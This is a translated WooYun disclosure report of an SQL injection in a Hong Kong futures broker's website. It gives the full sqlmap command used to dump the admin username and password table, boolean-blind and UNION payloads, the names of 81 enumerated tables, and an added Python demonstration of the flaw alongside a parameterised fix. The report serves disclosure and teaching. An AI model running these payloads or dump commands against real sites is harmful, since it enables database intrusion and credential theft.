
Vulnerability summary

Defect ID: wooyun-2015-0151169

Title: SQL injection at a location on the site of 直達國際金融服務有限公司 (81 tables / usernames and passwords leaked) (Hong Kong)

Vendor: 直達國際金融服務有限公司

Author: 路人甲

Submitted: 2015-11-03 15:06

Fixed: 2015-12-19 18:44

Published: 2015-12-19 18:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organisation (HKCERT, Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-03: Details sent to the vendor; awaiting the vendor's response
2015-11-04: Vendor confirmed; details visible to the vendor only
2015-11-14: Details opened to core white hats and relevant domain experts
2015-11-24: Details opened to regular white hats
2015-12-04: Details opened to intern white hats
2015-12-19: Details opened to the public

Brief description:

直达国际期货有限公司 (Direct Access International Futures Ltd) was founded in April 2011 and is headquartered in Hong Kong. Formally licensed by the Hong Kong SFC and operating under the relevant laws and regulations, it runs a brokerage business in futures, options and other derivatives on the major exchanges in Hong Kong and overseas. Its CE number is AXH777.
上海直达软件公司 (Shanghai Direct Access Software), a sister company, employs close to 20 professional software engineers and has built a dedicated-line network covering mainland China, South Korea, Hong Kong and the United States. It supplies a global trading platform, a clearing system, a risk-management platform and algorithmic-trading products, giving the firm's clients a stable, fast trading system.
In 2014, a direct dedicated line to Chicago and a colocation platform in Chicago were set up, giving the firm's high-frequency clients a high-speed, low-latency trading environment and greatly improving the ability of cross-market arbitrage funds and large institutional clients to seize market opportunities, competing for a millisecond advantage.
Since its founding the firm has focused on listening to and meeting client needs and on building long-term partnerships with clients. It quickly won client recognition, its trading volume grew rapidly, and it now ranks among the leading Chinese-funded futures firms in Hong Kong, firmly established as a rising leader in the overseas futures industry.

Detailed description:

URL: http://**.**.**.**/about/showNews.html?newsid=121

python sqlmap.py -u "http://**.**.**.**/about/showNews.html?newsid=121" -p newsid --technique=BTU --random-agent --batch -D directaccess_db -T manage_admin -C id,username,userpassword --dump

Proof of vulnerability:

---
Parameter: newsid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsid=121 AND 3774=3774
Type: UNION query
Title: MySQL UNION query (28) - 9 columns
Payload: newsid=-1875 UNION ALL SELECT 28,28,CONCAT(0x71767a6b71,0x65594d545066477759426c554562796f7257515554666a69564250535451534a6b41446d50536f78,0x7162767871),28,28,28,28,28,28#
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current user: 'directaccess_ad@%'
current user is DBA: False
database management system users [1]:
[*] 'directaccess_ad'@'%'
available databases [2]:
[*] directaccess_db
[*] information_schema
Database: directaccess_db
[81 tables]
+---------------------------------+
| cfaq_category |
| cost_category |
| forexfaq_category |
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_business |
| manage_calendar |
| manage_cfaq |
| manage_config |
| manage_cost |
| manage_exchange |
| manage_exchange1 |
| manage_forexfaq |
| manage_formdownload |
| manage_good |
| manage_introduce |
| manage_jobs |
| manage_kaihu |
| manage_link |
| manage_match |
| manage_newestmargin |
| manage_news |
| manage_newsmatch |
| manage_notice |
| manage_notice1 |
| manage_other |
| manage_research |
| manage_sefaq |
| manage_sfaq |
| manage_share |
| manage_signup |
| manage_slider |
| manage_slider1 |
| manage_software |
| manage_subscribe |
| manage_trader |
| manage_trader1 |
| manage_trader2 |
| manage_trader3 |
| manage_trader4 |
| manage_trader5 |
| manage_trader_1 |
| manage_trader_2 |
| manage_trading |
| manage_variety |
| manage_video |
| manage_videokaihu |
| match_category |
| members |
| news_category |
| research_category |
| sefaq_category |
| sfaq_category |
| share_category |
| variety_category |
| video_category |
| zhida_assets |
| zhida_forex_ad |
| zhida_forex_bdxz |
| zhida_forex_fgg_category |
| zhida_forex_fyjgb_category |
| zhida_forex_gonggao |
| zhida_forex_yjbg |
| zhida_forex_zn |
| zhida_fund |
| zhida_futures_ad |
| zhida_futures_bdxz |
| zhida_futures_fgg_category |
| zhida_futures_fyjgb_category |
| zhida_futures_gonggao |
| zhida_futures_yjbg |
| zhida_futures_zn |
| zhida_home_ad |
| zhida_securities_ad |
| zhida_securities_bdxz |
| zhida_securities_fgg_category |
| zhida_securities_fyjgb_category |
| zhida_securities_gonggao |
| zhida_securities_yjbg |
| zhida_securities_zn |
+---------------------------------+
Database: directaccess_db
Table: manage_admin
[4 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| content | mediumtext |
| id | int(11) |
| username | varchar(200) |
| userpassword | varchar(200) |
+--------------+--------------+
Database: directaccess_db
Table: manage_admin
[11 entries]

Fix recommendation:

Deploy a WAF.
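As an added illustration of the root-cause fix (this is not code from the original report or from the affected site), the query pattern the finding implies for the newsid parameter is shown beside a hardened version that validates the type and binds the value; the table name manage_news, its columns and the sample rows are assumed and constructed, and an in-memory SQLite database stands in for the site's MySQL.

```python
import sqlite3

# The two payload shapes sqlmap reported against newsid on this page:
# the boolean-blind probe verbatim, and the UNION shape cut down to this
# constructed table's two columns (the real one needed nine).
BOOLEAN_PAYLOAD = "121 AND 3774=3774"
UNION_PAYLOAD = "-1875 UNION ALL SELECT 28,'injected'"


def make_db():
    """Constructed stand-in for the news table (schema and rows are assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE manage_news (newsid INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO manage_news VALUES (?, ?)",
        [(120, "Margin notice"), (121, "Holiday schedule"), (122, "New contract")],
    )
    return conn


def show_news_vulnerable(conn, newsid: str):
    """The pattern the report implies: the GET value is pasted into the SQL text."""
    sql = "SELECT newsid, title FROM manage_news WHERE newsid=" + newsid
    return conn.execute(sql).fetchall()


def show_news_fixed(conn, newsid: str):
    """Hardened handler: reject anything but digits, then bind as a parameter."""
    if not newsid.isdigit():
        raise ValueError("newsid must be a positive integer")
    sql = "SELECT newsid, title FROM manage_news WHERE newsid=?"
    return conn.execute(sql, (int(newsid),)).fetchall()


def rejects(conn, newsid: str) -> bool:
    """True if the hardened handler refuses the value."""
    try:
        show_news_fixed(conn, newsid)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    # Vulnerable: the boolean probe returns the same row as the plain id (a
    # "true" oracle), and the UNION shape returns attacker-chosen data.
    print(show_news_vulnerable(db, BOOLEAN_PAYLOAD))
    print(show_news_vulnerable(db, UNION_PAYLOAD))
    # Fixed: the plain id still works, both payloads are refused.
    print(show_news_fixed(db, "121"), rejects(db, BOOLEAN_PAYLOAD), rejects(db, UNION_PAYLOAD))
```

Binding the parameter is the change that closes the hole; a WAF in front, as the report suggests, only filters the traffic and leaves the concatenated query in place.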

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2015-11-04 18:42

Vendor reply:

The incident has been reported to the relevant organisations.

Latest status:

None yet